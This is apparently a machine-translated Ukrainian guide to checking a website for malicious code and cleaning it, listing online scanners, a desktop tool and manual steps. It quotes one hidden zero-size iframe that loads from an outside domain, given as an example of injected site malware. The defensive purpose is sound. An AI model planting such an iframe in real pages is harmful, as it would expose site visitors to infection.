1. В якому випадку потрібно проводити перевірку сайту?
2. Як перевірити, чи є на сайті шкідливий код?
3. Що робити далі.

Тема перевірки сайту на вірус може бути цікава не тільки веб-майстрам, а й і читачам, відвідувачам веб-сторінок.

Думаю, що багато хто стикався з попередженнями свого антивіруса про те, що сайт містить шкідливий код і відвідування його може обернутися зараженням комп'ютера. А для веб-майстра зміст сайту в порядку - річ життєво необхідна.

В якому випадку потрібно проводити перевірку сайту?

1. Ви відкриваєте сайт, а ваш антивірус видає повідомлення, що на сайті виявлений шкідливий код

2. Відвідувачі вашого сайту пишуть вам про те, що ваш сайт забракований антивірусом

3. Google або Яндекс надіслав повідомлення, що на вашому сайті виявлений шкідливий код і відвідування певних сторінок мого сайту може призвести до зараження комп'ютерів користувачів.

4. Якщо ви чули історії про те, як розводять користувачів ВКонтакте , То, отримавши від одного по електронній пошті посилання, добре б перевірити її на наявність шкідливого коду.

Як перевірити, чи є на сайті шкідливий код?

Перший спосіб перевірити підозрілий сайт на віруси влаштує і веб-майстрів, і звичайних користувачів, які бажають перевірити підозрілий сайт. Це - використання онлайн-сервісів. Це досить зручно. Фактично, всі ці сервіси працюють однаково: досить ввести адресу перевіряється сайту в спеціальне поле і натиснути кнопку Перевірити. Сервіс перевірить сайт на ниличие вірусу, зробивши прогін по своїх базах. Нижче представлений список таких сервісів.

Перевірити сайт можна за допомогою вкладки «безпасность» в Яндекс.Вебмастере. У разі зараження сайту на ній буде список заражених сторінок і тип зараження кожної з них. У більшості випадків зараження є можливість перейти в розділ допомоги з прикладами шкідливого коду, які допомагають його виявити.

2ip - принцип роботи з цим сервісом звичайний: вказуємо адресу підозрілого сайту і натискаємо кнопку «Перевірити». В результаті перевірки вам повідомлять, чи були виявлені на сайті віруси або підозрілі коди. Цей сервіс також перевіряє, чи вважають пошуковики Яндекс і Google цей сайт зараженим.

Antivirus Alarm - для сканування зазначеного вами сайту сервіс використовує антивірусні бази від найбільших світових антивірусних компаній. Повне сканування триває до 10 хвилин і не зупиняється, навіть якщо ви закриваєте сторінку. Тут же вказується посилання, по якій ви зможете подивитися результати в будь-який час. Цей сервіс ще хороший тим, що тут є список найбільш часто виявляються вірусів на сайтах. Наприклад, ось так виглядає код вірусу iframe asqyt.in:

<Iframe src = "http://asqyt.in/index.php?tp=544a75b9de10d062" width = "0" height = "0" frameborder = "0"> </ iframe>

Тут же є і список НЕ вирусов. Це дозволяє не поспішати панікувати, коли одна з антивірусних програм приймає код за вірус.

sitecheck.sucuri.net - ще один сервіс по перевірці сайту. Тут ви можете прочитати невеликі інструкції, як впізнати і як видалити вірус на сайті.

Sucuri.net - цей сервіс ще хороший тим, що він показує, який саме файл сайту заражений. Тут же можна подивитися, які файли були скановані. Крім пошуку шкідливого коду він ще звіряє зовнішні посилання сайту з чорним списком і видає список сторінок, на яких були знайдені такі посилання. Для одного мого сайту на движку WordPress була видана рекомендація оновити версію WordPress. І справді ця рекомендація допомогла - посилання зникли. Тільки ось одне але: перевірка виконується в повному обсязі, оскільки сервіс платний, але і ті рекомендації, які були видані - дійсно цінні.

Для чого такий великий список онлайн-сервісів? Адже проблема в тому, що не всі вони показують однаковий результат. На мій погляд, https://sucuri.net/ показав самий грунтовні результати.

Другий спосіб для перевірки сайту підійде більше веб-майстрам. Для цього вам знадобиться програма SiteVerify, яка і буде перевіряти сайти на наявність шкідливих програм і коду. Програма написана з використанням технології .Net, тому важить вона зовсім мало, проте, якщо у вас встановлена ​​Windows XP, то вам доведеться ще додатково встановити Microsoft .Net. У Windows 7 нічого додатково встановлювати не треба.

В програмі практично немає ніяких налаштувань. Також, як і в онлайнових сервісах перевірки, потрібно лише вказати адресу сторінки і натиснути кнопку GO.

Починається сканування сайту. Спочатку формується список всього того, що є на сайті, а потім виконується прогін по базах. Синім кольором позначені «здорові» файли, а червоним - заражені. Приємно бачити свій сайт в синьому кольорі.

Що робити далі.

Якщо ваш сайт здоровий, то можна зітхнути спокійно. А ось що робити в тому випадку, якщо вам показали, що у вас все-таки є шкідливий код на сайті? Проблема в тому, що всі ці сканери працює не так, як комп'ютерні антивіруси. Шукати шкідливий код доведеться самим. І що залишається бідному веб-майстру? Кого кликати на допомогу, юрист онлайн тут вам навряд чи допоможе. Потрібно вчитися розбиратися самому.

Навіть якщо ви скористалися програмою SiteVerify, який покаже вам, в яких файлах знайдений шкідливий код, прибирати вам доведеться його своїми руками.

Як правило, найчастіше сайти заражає так званий iframe-вірус. По суті, цей вірус складається з коду <iframe> .... </ Iframe>. Вірус краде всі паролі з Total Commander або іншого ftp-клієнта.

Як шукати шкідливий код:

1. В панелі управління хостингу потрібно змінити пароль.

2. Міняємо і видаляємо паролі в ftp-клієнта.

3. Заходимо на хостинг по ftp. Сортуємо файли за датою останньої зміни. У заражених файлів дата повинна бути свіжа і однакова. Відкрийте ці файли і шукайте код iframe, як правило цей код розташовується в самому кінці. В основному, шкідливий код прописується в файлах: index.php, index.html, в файлах з розширенням .js. Нерідко, ця зараза проживає між тегами <script> ... </ script>.

4. Для вордпресс можна використовувати плагін TAC. Він перевіряє файли у всіх темах в папці themes на наявність стороннього коду. Якщо TAC знайде не бажаний код, то покаже шлях до цього файлу. Таким чином, можна обчислити вірус.

5. Коли знайдете і видаліть шкідливий код, то перевірте свій комп'ютер на наявність вірусів.

6. Якщо Ваш сайт був позначений Гуглом або Яндксом як заражений, то через панель вебмастера треба відправити запит в пошукову систему на повторну перевірку. Зазвичай протягом доби позначка про те, що сайт заражений, прибирається.